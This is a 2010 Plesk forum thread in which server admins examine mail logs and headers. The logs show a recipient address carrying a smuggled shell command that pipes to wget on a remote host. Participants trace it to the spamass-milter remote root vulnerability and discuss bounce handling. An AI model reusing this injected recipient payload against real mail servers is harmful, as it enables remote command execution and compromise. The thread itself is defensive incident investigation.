• If you are still using CentOS 7.9, it's time to convert to Alma 8 with the free centos2alma tool by Plesk or Plesk Migrator. Please let us know your experiences or concerns in this thread:
    CentOS2Alma discussion

Is this a new hack?

R

Ritey

Guest
Hi,

My plesk has "reject" set to all mail domains. Yet today i received two bounces. So i looked at the mail log.
/usr/local/psa/log/maillog and found some strange enties.....

Apr 11 15:15:21 plesk /var/qmail/bin/relaylock[7933]: /var/qmail/bin/relaylock: mail from 85.92.138.149:49771 (hosted.by.pcextreme)
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: Handlers Filter before-queue for qmail started ...
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: [email protected]
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: to=root+:|wget http://xfortunes.in/x1x.php
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: hook_dir = '/usr/local/psa/handlers/before-queue'
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: call_handlers: call executable = '/usr/local/psa/handlers/info/05-grey-qMrEAh/executable'
Apr 11 15:15:21 plesk greylisting filter[7937]: Starting greylisting filter...
Apr 11 15:15:21 plesk greylisting filter[7937]: Unable get domain name by e-mail address root+:|wget http://xfortunes.in/x1x.php: Success
Apr 11 15:15:21 plesk greylisting filter[7937]: Unable to get GL trio status
Apr 11 15:15:21 plesk greylisting filter[7937]: Unable to check message
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: call_handlers: Error during call '/usr/local/psa/handlers/info/05-grey-qMrEAh/executable' handler
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: LOG Internal error in handler '05-grey-qMrEAh'. Skip handler.
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: call_handlers: call executable = '/usr/local/psa/handlers/info/10-spf-ixyyCD/executable'
Apr 11 15:15:21 plesk spf filter[7938]: Starting spf filter...
Apr 11 15:15:21 plesk spf filter[7938]: Error code: (2) Could not find a valid SPF record
Apr 11 15:15:21 plesk spf filter[7938]: Failed to query MAIL-FROM: No DNS data for 'dick.com'.
Apr 11 15:15:21 plesk spf filter[7938]: SPF result: none
Apr 11 15:15:21 plesk spf filter[7938]: SPF status: PASS
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: handlers_stderr: PASS
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: call_handlers: PASS during call '/usr/local/psa/handlers/info/10-spf-ixyyCD/executable' handler
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: recipient[3] = 'root+:|wget http://xfortunes.in/x1x.php'
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: handlers dir = '/usr/local/psa/handlers/before-queue/recipient/root+:|wget http://xfortunes.in/x1x.php'
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: starter: submitter[7939] exited normally
Apr 11 15:15:21 plesk qmail: 1270995321.460367 new msg 403377118
Apr 11 15:15:21 plesk qmail: 1270995321.460422 info msg 403377118: bytes 236 from <[email protected]> qp 7939 uid 2020
Apr 11 15:15:21 plesk qmail: 1270995321.467336 starting delivery 879: msg 403377118 to local root+:|wget_http://xfortunes.in/x1x.php@plesk.DOMAIN.net
Apr 11 15:15:21 plesk qmail: 1270995321.467372 status: local 1/10 remote 0/20
Click to expand...

I replaced my real domain with DOMAIN.
I also added and x to the beggining of the URLs as i dont want anyone to goto that site by mistake!

As you can see by the recipient it contains a wget... This to me is a little worrying!
And also why did qmail decide to send a bounce?
And why was my plesk domain name appended to the original recipient?

My plesk is on the latest 9.3 version.

Can anyone shed some light on this please?
 
It looks like that your server is compromised. Did you tried to check it with chkrootkit or rkhunter ?
 
Thanks for your reply.

I did try to emulate the issue (but obviously using a safe url that i can track). And found that the 'wget ...' in the recipient, is not actually executed. So that is one thing to be grateful for!

But it does seem to create a bounce though which is a little worrying.

I have checked the box and it seems fine.

So the issue for me really is, how can i prevent ALL bounce mails?
 
I got the same mail. On a test machine i downloaded the x1x.php using wget. What i get is a text string "xxx".

Notes:
1. three underscores in front of the "fortunes" domain
2. replaced the real Hostname (actualy it was my reverse dns) with MY-REVERSE-DNS
3. Seems i'm not compromised but i'm investigating.
4. I'm not using parallels. It's a debian box latest patches applied

From [email protected] Sat Apr 10 09:23:06 2010
Return-Path: <[email protected]>
X-Original-To: "root+:|wget http://___fortunes.in/x1x.php"
Delivered-To: "root+:|wget http://___fortunes.in/x1x.php"@MY-REVERSE-DNS
Received: from bluedick (unknown [208.88.6.50])
by MY-REVERSE-DNS (Postfix) with SMTP id 407DA54A0872
for <"root+:|wget http://___fortunes.in/x1x.php">; Sat, 10 Apr 2010 09:23:$
Message-Id: <20100410072306.407DA54A0872@MY-REVERSE-DNS>
Date: Sat, 10 Apr 2010 09:23:06 +0200 (CEST)
From: [email protected]
To: undisclosed-recipients:;
Status: RO
Content-Length: 0
Lines: 0
Click to expand...
 
It could well be that the sender expects the bounce message to be read by a certain mail client or webmail. In which case it may render the recipient name to be something clickable and once clicked, could then trigger some other nasty stuff. Such as vulnerabilities in mail/webmail clients.
 
Hi,
i found it. They try to exploit SpamAssassin's milter vulnerability.
Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).
Click to expand...
Spamassassin Milter Plugin Remote Root Attack
http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html

Phew :) good i fixed that already.
 
and the question is : does Plesk use this software embedded somewhere ??
 
Well found cepstrum.

How a plugin be to for it to make a such a possible. The author of it should.

But my original question is still as of yet unanswered. Is it possible to stop ALL.

This little script hacker didnt get what he wanted but he did manage to make a bounce where bounces shouldnt happen.

So it has exposed an issue in my thoughts, that needs fixing.
 
You must log in or register to reply here.

Similar threads

A
Issue Plesk Postfix resolving external address as local
Replies
17
Views
2K
Kaspar
K
M
Issue Site Import Error UnicodeEncodeError: 'ascii'
Replies
1
Views
691
Peter Debik
P
G
Issue Plesk Migrator: Subscribers, Service Plans and Customers not properly transferred
Replies
12
Views
1K
Peter Debik
P
T
Question No outgoing mails, without using mailboxes on plesk
Replies
3
Views
958
Bitpalast
Bitpalast
nethubonline
Resolved Plesk install failure on AlmaLinux 9
Replies
3
Views
1K
nethubonline
nethubonline
Back
Top